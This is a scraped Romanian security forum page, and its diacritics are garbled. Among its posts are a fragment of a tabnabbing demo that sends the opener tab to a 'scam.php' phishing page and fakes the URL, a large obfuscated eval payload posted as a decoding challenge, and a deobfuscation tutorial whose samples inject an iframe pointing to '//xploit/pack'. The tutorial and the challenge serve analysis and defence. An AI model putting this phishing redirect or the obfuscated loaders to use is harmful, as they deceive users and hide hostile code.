encodeURIComponent(document.referrer); window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer; Apoi, pe pagina scam.php am folosit urm?torul cod: // Extragem leg?tura adresei URL ?i elimin?m numele domeniului var fakeurl = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', ''); // Modific?m adresa URL f?r? a înc?rca con?inutul acelei pagini window.history.pushState(false, false, fake_url); În loc de concluzii Sincer, nu în?eleg, ce a fost în capul dezvoltatorilor ca s? permit? executarea func?iei location.replace() sau modificarea obiectului location dintre dou? domenii diferite? Dac? era de pe acela?i domeniu, în?elegeam... ?i chiar e foarte straniu, c?ci celelalte func?ii ?i atribute ale obiectului window.opener nu pot nici m?car citite, deoarece:
  18. M? gândeam ast?zi s? scriu un articol despre cum s? faci propriul obfuscator JavaScript — un obfuscator ce nu poate fi decriptat automat de JSBeautifier sau alte aplica?ii asemeni lui (desigur, a?a ceva nu exist?). A?a c? am scris scriptul care „cripteaz?” codul surs?, am testat (în browserele Firefox, Chrome ?i IE) s? vad dac? nu mi-a sc?pat nimic, ?i într-un final, am f?cut o pagin? HTML ce permite s? inserezi ?i s? „criptezi” codul JavaScript în mod automat. Dar, înainte de a scrie articolul, am hot?rât s? verific cât de rapizi ?i cât de aten?i sunte?i. Dup? aceasta, mai vedem noi cum proced?m cu articolul — dac? v? intereseaz? acest subiect, voi scrie articolul cu mare pl?cere. Deci, mai jos ave?i o versiune mai simpl? a codului criptat. Voi trebuie s?-l decripta?i cu mare aten?ie, iar dup? ce ob?ine?i sursa JavaScript, îmi trimite?i un PM cu codul surs? ?i metoda care a?i folosit-o. eval(unescape("%28function%20%28r%2C%20s%2C%20t%29%20%7B%0A%20%20%20%20var%20decode%20%3D%20function%20%28c%29%20%7Bvar%20ox%20%3D%20hash%20%3D%3D%20r%20%3F%201%20%3A%202%3Breturn%20String.fromCharCode%28c%20*%20ox%29%3B%7D%3B%0A%20%20%20%20var%20exec%20%3D%20function%20%28i%29%20%7Bif%20%28typeof%20i%20%3D%3D%20%22number%22%29%20%7Bvar%20cc%20%3D%20lines%5Bi%5D%20/%20t%20/%20len%3Bi%20%3D%20%22decode%28cc%29%22%3B%7Dreturn%20eval%28i%29%3B%7D%3B%0A%20%20%20%20var%20lines%20%3D%20s.split%28%22%5Cu2063%22%29%3B%0A%20%20%20%20var%20arg%20%3D%20arguments.callee.toString%28%29.replace%28/%5B%5Ea-z0-9%5D/gi%2C%20%22%22%29%3B%0A%20%20%20%20var%20hash%20%3D%20arg.replace%28/%5B%5Ea-f%5D/g%2C%20%22%22%29%3B%0A%20%20%20%20var%20len%20%3D%20arg.length%3B%0A%20%20%20%20var%20str%20%3D%20%22%22%3B%0A%20%20%20%20for%20%28var%20i%20%3D%200%3B%20i%20%3C%20lines.length%3B%20i++%29%20%7B%0A%20%20%20%20%20%20%20%20str%20+%3D%20exec%28i%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20exec%28str%29%3B%0A%7D%29%28%22fcadecdefccaaefadecaeecfcfefbeacceedecdecceeaaeaaaecaeeeaceaaaaeaceafaeaeafaeeeeceec%22%2C%20%2219647376%u206317335920%u206318161440%u206316510400%u206318326544%u206319647376%u20637594784%u206318326544%u206318161440%u206317831232%u206318326544%u206316015088%u206316510400%u20635283328%u206310071344%u20635283328%u206316840608%u206319317168%u206318161440%u206316345296%u206319152064%u206317335920%u206318326544%u206318161440%u20635283328%u20636604160%u20636769264%u20635283328%u206320307792%u20631651040%u20635283328%u20635283328%u20635283328%u206316840608%u206319317168%u206318161440%u206316345296%u206319152064%u206317335920%u206318326544%u206318161440%u20635283328%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u20635283328%u206320307792%u20631651040%u20635283328%u20635283328%u20635283328%u20635283328%u20635283328%u20635283328%u206318821856%u206316675504%u206319152064%u206319317168%u206318821856%u206318161440%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206318821856%u206316015088%u206318161440%u206316510400%u206318326544%u206317996336%u20636604160%u20636769264%u20635283328%u20636934368%u20635283328%u20639410928%u20639410928%u20639410928%u20639410928%u20639410928%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206320638000%u20631651040%u20631651040%u20635283328%u20635283328%u20635283328%u206319482272%u206316015088%u206318821856%u20635283328%u206318656752%u20635283328%u206310071344%u20635283328%u206315024464%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u20637264576%u20635283328%u206318821856%u206316015088%u206318161440%u206316510400%u20636604160%u20636769264%u206315354672%u20631651040%u20635283328%u20635283328%u20635283328%u206318656752%u206315024464%u20638255200%u206315354672%u20635283328%u206310071344%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u20636604160%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638090096%u206315354672%u20636769264%u20635283328%u20637759888%u20635283328%u20638255200%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206318656752%u206315024464%u20638420304%u206315354672%u20635283328%u206310071344%u20635283328%u206312713008%u206316015088%u206319152064%u206317170816%u20637594784%u206316840608%u206317831232%u206318326544%u206318326544%u206318821856%u20636604160%u20636604160%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638090096%u206315354672%u20635283328%u20637429680%u20635283328%u206318656752%u206315024464%u20637924992%u206315354672%u20635283328%u20637099472%u20635283328%u206318656752%u206315024464%u20638255200%u206315354672%u20636769264%u20635283328%u20637759888%u20635283328%u20638255200%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u20631651040%u20635283328%u20635283328%u20635283328%u20637759888%u20637759888%u20635283328%u206313868736%u206317170816%u206317335920%u206318986960%u20635283328%u206317335920%u206318986960%u20635283328%u206319317168%u206318986960%u206316675504%u206316510400%u20635283328%u206319152064%u206318326544%u20635283328%u206316345296%u206318326544%u206319317168%u206318161440%u206319152064%u20635283328%u206317170816%u206318326544%u206319647376%u20635283328%u206317996336%u206316015088%u206318161440%u206319977584%u20635283328%u206318491648%u206316675504%u206318326544%u206318491648%u206317831232%u206316675504%u20635283328%u206316015088%u206318821856%u206316675504%u20635283328%u206316345296%u206316015088%u206318821856%u206316675504%u206317831232%u206316675504%u206318986960%u206318986960%u20631651040%u20635283328%u20635283328%u20635283328%u206319482272%u206316015088%u206318821856%u20635283328%u206316675504%u206317831232%u206317996336%u20635283328%u206310071344%u20635283328%u206316510400%u206318326544%u206316345296%u206319317168%u206317996336%u206316675504%u206318161440%u206319152064%u20637594784%u206316345296%u206318821856%u206316675504%u206316015088%u206319152064%u206316675504%u206311392176%u206317831232%u206316675504%u206317996336%u206316675504%u206318161440%u206319152064%u20636604160%u20636439056%u206317335920%u206316840608%u206318821856%u206316015088%u206317996336%u206316675504%u20636439056%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206318986960%u206318821856%u206316345296%u20636439056%u20637264576%u20635283328%u20636439056%u206317170816%u206319152064%u206319152064%u206318491648%u20639576032%u20637759888%u20637759888%u206319152064%u206316675504%u206318986960%u206319152064%u20637594784%u206318986960%u206316675504%u206316345296%u206319317168%u206318821856%u206318821856%u206317335920%u206319152064%u206319977584%u20637594784%u206318821856%u206319317168%u20637759888%u206316345296%u206317170816%u206316015088%u206317831232%u206317831232%u206316675504%u206318161440%u206317005712%u206316675504%u206318986960%u20637759888%u206317501024%u206318986960%u206318326544%u20637759888%u206319812480%u206319977584%u206320142688%u20637594784%u206318491648%u206317170816%u206318491648%u206310401552%u206317170816%u206316015088%u206318986960%u206317170816%u206310071344%u20636439056%u20635283328%u20637099472%u20635283328%u206318656752%u20637594784%u206317501024%u206318326544%u206317335920%u206318161440%u20636604160%u20636439056%u20637594784%u20636439056%u20636769264%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206317170816%u206316675504%u206317335920%u206317005712%u206317170816%u206319152064%u20636439056%u20637264576%u20635283328%u20637924992%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206317170816%u206316675504%u206317335920%u206317005712%u206317170816%u206319152064%u20636439056%u20637264576%u20635283328%u20637924992%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316675504%u206317831232%u206317996336%u20637594784%u206318986960%u206316675504%u206319152064%u206310731760%u206319152064%u206319152064%u206318821856%u206317335920%u206316180192%u206319317168%u206319152064%u206316675504%u20636604160%u20636439056%u206318986960%u206319152064%u206319977584%u206317831232%u206316675504%u20636439056%u20637264576%u20635283328%u20636439056%u206316510400%u206317335920%u206318986960%u206318491648%u206317831232%u206316015088%u206319977584%u20639576032%u206318161440%u206318326544%u206318161440%u206316675504%u20639741136%u20635283328%u206317996336%u206316015088%u206318821856%u206317005712%u206317335920%u206318161440%u20637429680%u206317831232%u206316675504%u206316840608%u206319152064%u20639576032%u20637429680%u20639410928%u20639410928%u20639410928%u206318491648%u206319812480%u20636439056%u20636769264%u20639741136%u20631651040%u20635283328%u20635283328%u20635283328%u206316510400%u206318326544%u206316345296%u206319317168%u206317996336%u206316675504%u206318161440%u206319152064%u20637594784%u206316180192%u206318326544%u206316510400%u206319977584%u20637594784%u206316015088%u206318491648%u206318491648%u206316675504%u206318161440%u206316510400%u206311061968%u206317170816%u206317335920%u206317831232%u206316510400%u20636604160%u206316675504%u206317831232%u206317996336%u20636769264%u20639741136%u20631651040%u206320638000%u20639741136%22%2C%20607%29%3B")); Finali?ti: 15-11-2012, 06:23 PM ? baltag 17-11-2012, 07:09 PM ? grinder
  19. B7ackAnge7z


    V?zând c? nu este nici un post despre aplica?ia Blockly, am hot?rât s? repar aceast? gre?eal?. Deci, Blockly este o aplica?ie WEB ce reprezint? un editor grafic de programare. Pentru a crea o aplica?ie, utilizatorul nu prea va avea nevoie de tastatur?, ci mai mult de un mouse cu care s? mi?te ?i s? aranjeze „blocurile” cu instruc?iuni logice, condi?ionale sau repetitive. Foarte interesant? ?i util? este posibilitatea de a exporta blocurile în JavaScript, Dart sau Python. De exemplu, urm?toarea construc?ie: exportat? în JavaScript, v-a ar?ta a?a: var msg; var Letters; var i; msg = ''; Letters = ['R','S','T'].join(''); for (var i_index in Letters) { i = Letters[i_index]; msg = msg + i; } window.alert(msg); iar în Python, a?a: msg = None Letters = None i = None msg = '' Letters = ''.join([str(temp_value) for temp_value in ['R', 'S', 'T']]) for i in Letters: msg = msg + i print(msg) Cei ce cunosc Python sau/?i JavaScript — v? rog s? nu analiza?i exemplele de mai sus. Dup? cum v? da?i bine seama, Blockly nu e tocmai reu?it pentru a sparge o parol? Yahoo sau pentru a g?si vulnerabilit??i în serverele NASA. Pe de alt? parte, de exemplu, Blockly e o aplica?ie perfect? pentru dezvolta logica de programator sau pentru a fi folosit? de c?tre profesori (?i nu numai) pentru a preda programarea. La final v? propun Blockly Maze — ie?i?i din labirint într-un mod cât mai eficient (rapid ?i folosind cât mai pu?ine instruc?iuni logice). R?spunsurile le posta?i în comentarii ad?ugând screenshot-ul rezolv?rii. Dac? ob?ine?i mai mult de 12 blocuri — pute?i seta screenshot-ul ca background pe desktop (?i desigur, f?r? a mai publica r?spunsul aici).
  20. Cu siguran?? mul?i dintre voi cunoa?te?i sintaxa JavaScript, pute?i scrie ?i citi un fragment de cod scris în acest limbaj, îns? cu toate acestea a?i întâlnit scripturi JavaScript, care la prima vedere par indescifrabile. Dac? faci parte din acest grup ?i dore?ti s? afli câteva trucuri ce te-ar ajuta s? decriptezi scripturile „obfuscate” — î?i propun s? cite?ti acest mic tutorial. De asemenea, a? recomanda tutorialul ?i celor care au ceva experien?? în domeniu — c?ci deseori am v?zut c? ei folosesc tehnici nu tocmai sigure pentru a ob?ine un cod lizibil. » Ce este un obfuscator ?i la ce folose?te? În caz c? nu ?tia?i, un obfuscator este aplica?ia ce are ca scop transformarea codului surs? într-un cod indescifrabil, care r?mâne perfect func?ional chiar dac? sursa a fost modificat? ?i la final arat? ca naiba. De cele mai multe ori, obfuscatorul este folosit pentru a ascunde codul de „cititorii nepofti?i”, astfel încât ei s? nu afle ce func?ie îndepline?te acel script. De asemenea, obfuscatorul mai este folosit ?i pentru a nu permite modificarea ?i utilizarea scriptului f?r? ?tirea autorului. » Diferen?a dintre a obfusca ?i a comprima Multe persoane consider? c? a „obfusca” ?i a „comprima” codul este unul ?i acela?i lucru. Gre?it. E important de ?tiut c?, comprimarea se folose?te pentru a minimaliza cantitatea de cod (acest lucru se ob?ine prin eliminarea comentariilor, spa?iilor ?i altor caractere inutile), astfel comprimarea ajut? la sporirea performan?ei aplica?iei WEB. Pe de alt? parte, obfuscarea face exact invers — pentru a fi posibil? criptarea codului, m?re?te cantitatea de cod (ad?ugând func?ii, cicluri, variabile, etc.), astfel reducând considerabil din performan?a aplica?iei WEB. Pentru a vedea diferen?a dintre obfuscarea ?i comprimarea codului JavaScript, propun s? analiza?i urm?toarele exemple: >> Codul ini?ial (263 caractere): // Verific?m adresa site-ului if (!window.location.hostname != 'www.site.com') { // Preîntâmpin?m utilizatorul alert('Acest site incalc? drepturile de autor'); // Redirec?ion?m utilizatorul window.location.replace('http://www.site.com/'); } >> Codul comprimat (143 caractere): if(!window.location.hostname!='www.site.com'){alert('Acest site incalc? drepturile de autor');window.location.replace('http://www.site.com/')} >> Codul obfuscat (445 caractere): eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('5(!1.2.6!=\'3.0.4\'){7(\'8 0 9? a b c\');1.2.d(\'e://3.0.4/\')}',15,15,'site|window|location|www|com|if|hostname|alert|Acest|incalc|drepturile|de|autor|replace|http'.split('|'),0,{})) Dup? cum pute?i vedea (dac? decripta?i codul obfuscat) singura asem?nare dintre aceste dou? procese este faptul c? în ambele cazuri vor fi eliminate comentariile JavaScript. » De ce e periculos s? înlocuim eval() cu document.write() Am v?zut multe persoane care decodeaz? scripturile înlocuind func?ia eval() cu document.write() f?r? s? se gândeasc? c? scriptul criptat se rezum? la: document.write('<iframe src="//xploit/pack"></iframe>'); De exemplu, dac? criptat, codul de mai sus arat? a?a: eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); iar noi înlocuim func?ia eval() cu document.write() ?i execut?m scriptul în browser, iframe-ul v-a înc?rca cu succes con?inutul paginii //xploit/pack: document.write("document.write('<iframe src="//xploit/pack"></iframe>'"); Iat? de ce, niciodat? s? nu folosi?i aceast? metod? (aici ar trebui s? fie un punct) dac? nu rula?i browser-ul pe PC-ul virtual sau nu dori?i s? trimite?i IP-ul spre un server necunoscut. » Despre JsBeautifier ?i alte aplica?ii similare Când apar întreb?rile despre decriptarea scripturilor, majoritatea arat? cu degetul spre JsBeautifier sau alte site-uri ce ofer? aplica?ii similare. Recunosc, JsBeautifier e o aplica?ie foarte util?, îns? e foarte limitat? ?i de regul? e foarte simplu s? o p?c?le?ti. De exemplu, lu?m exemplul de mai sus ?i-l modific?m pu?in: var e = eval, u = unescape; e(u('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); Dac? o s? încerca?i s?-l decripta?i cu JsBeautifier, v? anun? din start — pur ?i simplu ve?i r?mâne dezam?gi?i. » Modalit??i gre?ite de decriptare a codului JavaScript Nu exclud faptul c? mul?i nu vor fi de acord, dar personal consider c? a înlocui func?ia eval() cu alert() este o metod? gre?it? (acest lucru se refer? ?i la console.log() sau alt? func?ie similar?). Consider astfel, deoarece aceste func?ii nu permit decriptarea rapid? a codului criptat, plus citirea codului primit e foarte dificil?. Imagina?i-v?, un cod de 10k de caractere care apeleaz? de peste 100 ori la func?ia eval() — cu siguran?? trebuie s? ai nervi de o?el. O alt? metod? gre?it?, dar ?i periculoas?, este ad?ugarea unei linii document.write('<textarea>'); înainte de codul criptat ?i înlocuirea func?iei eval() cu document.write(). Dac? luam exemplul de mai sus, primim urm?torul cod: document.write('<textarea>'); document.write(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); document.write('</textarea>'); La executare vom primi un rezultat destul de interesant — va ap?rea un element de tip textarea în care v-a fi scris codul iframe-ului: <textarea><iframe src="//xploit/pack"></iframe></textarea> La prima vedere nimic periculos — iframe-ul nu a înc?rcat nimic, iar codul l-am primit în siguran?? f?r? a permite executarea unor altor func?ii sau linii de cod. Pericolul totu?i exist?, pentru c? cel care a criptat scriptul s-a gândit c? se vor g?si doritori de ai analiza capodopera, ?i cu siguran?? la codul surs? v-a ad?uga ?i ceva de genul: // </textarea> iar criptat, codul v-a ar?ta a?a: document.write(unescape('%2F%2F%20%3C%2F%74%65%78%74%61%72%65%61%3E%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%2F%2F%78%70%6C%6F%69%74%2F%70%61%63%6B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B')); La executare, dat fiind faptul c? HTML nu percepe comentariile JavaScript, linia // </textarea> v-a închide tag-ul elementului <textarea> ?i iframe-ul v-a înc?rca exploit-ul cu succes. » Decriptarea eficient? ?i sigur? a unui cod JavaScript Metoda pe care vreau s? v-o prezint, o foloseam cu ceva timp în urm?, ?i întotdeauna mi-a permis s? decodez rapid practic orice cod criptat scris în JavaScript. De aceea m-am gândit c? ar fi bine scriu despre aceasta, astfel ajutând pe cei mai pu?ini experimenta?i ?i protejându-i de eventualule pericole. Apropo, ar fi dr?gu? dac? a?i posta comentarii în care s? descrie?i metodele folosite de voi. Deci, metoda e foarte simpl? — trebuie s? redefinim func?iile eval() ?i document.write(), iar datele trimise c?tre acestea s? le scriem într-o c?su??: <!-- Cre?m c?su?a unde for fi salvate datele --> <textarea id="js" style="width:80%;height:200px"></textarea> <script> // Ob?inem elementul textarea var txt = document.getElementById('js'); // Redefinim func?iile document.write = window.eval = function (str) { // Scriem codul ce trebuia executat în c?su?a textarea txt.value += str; // Nu ne facem probleme în privin?a tag-urilor HTML, deoarece // browser-ul are grij? ca c?su?a s? fie completat? corespunz?tor }; </script> Dac? compres?m codul de mai sus, ob?inem dou? linii de cod, care mereu trebuie s? fie la îndemân?: <textarea id="js" style="width:80%;height:200px"></textarea> <script>var txt=document.getElementById('js');document.write=window.eval=function(str){txt.value+=str}</script> Desigur, dac? întâlni?i zilnic astfel de „sarcini”, poate fi creat ?i un JavaScript Bookmarklet, care s? fie accesat direct din browser. Nu recomand aceast? metod? (de alt fel, ca ?i oricare alta) celor care nu au idee ce fac func?iile document.createElement() sau {obj}.appendChild() — ar fi prea periculos. Iar în caz c? v? este fric? de alte func?ii, dar totu?i dori?i s? decripta?i orice cod scris în JavaScript — pur ?i simplu redefini?i-le al?turi de eval() ?i document.write() Decriptare pl?cut? ?i f?r? incidente.
  21. Salutare, stiu ca primul meu post pe acest forum, dar am nevoie de ajutorul vostru. Sunt noob cand vine vorba de Java sau JQuery, dar am nevoie de o functie care sa imi ascunda div-uri. Am gasit mai multe functii pe google, dar trebuie sa am mai multe id-uri unice, iar eu trebuie sa pun asta intr-o functie foreach deci pot pune 1 <div class="ex"> urmand sa fie generate dinamic 5 divuri.
  22. <script language="JavaScript" src="http://j.maxmind.com/app/geoip.js"></script> <br>Country Code: <script language="JavaScript">document.write(geoip_country_code());</script> <br>Country Name: <script language="JavaScript">document.write(geoip_country_name());</script> <br>City: <script language="JavaScript">document.write(geoip_city());</script> <br>Region: <script language="JavaScript">document.write(geoip_region());</script> <br>Region Name: <script language="JavaScript">document.write(geoip_region_name());</script> <br>Latitude: <script language="JavaScript">document.write(geoip_latitude());</script> <br>Longitude: <script language="JavaScript">document.write(geoip_longitude());</script> <br>Postal Code: <script language="JavaScript">document.write(geoip_postal_code());</script> sursa: http://www.maxmind.com/app/javascript_city Teoretic cica ar trebui sa pui link catre maxmind daca il folosesti pe site dar nu cred ca stau sa verifice... EDIT: uz posibil: <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script> $(function() { ( detect = ( function() { if(typeof geoip_country_code != "function") return setTimeout ( function() { detect(); } , 10); $.post("track.php" , { "cc": geoip_country_code(), "cn": geoip_country_name(), "ct": geoip_city(), "re": geoip_region(), "rn": geoip_region_name(), "lat": geoip_latitude(), "long": geoip_longitude(), "pc": geoip_postal_code() }); } ) )(); var _geoip = document.createElement("script"); _geoip.src = "//j.maxmind.com/app/geoip.js"; _geoip.async = true; document.body.appendChild(_geoip); }); avantaje: asincron si gratis...
  23. Greenbytes


    Salut, Ma intreb, in afara de HTML si CSS ce este indicat sa mai stii ca sa poti face ceva mai ok ? Browser Scripting - JavaScript si jQuery / AJAX ? Server Scripting - PHP ? Multumesc, Greenbytes
  24. JavaScript: The Definitive Guide, Sixth Edition JavaScript: The Good Parts P.S. Douglas Crockford's Javascript
  25. Alex, 26 de ani, web developer si system administrator ... sunt deschis tot timpul la incercari si idei noi si inevitabil, tot timpul ocupat cu ceva :)Bine v-am gasit
  • Create New...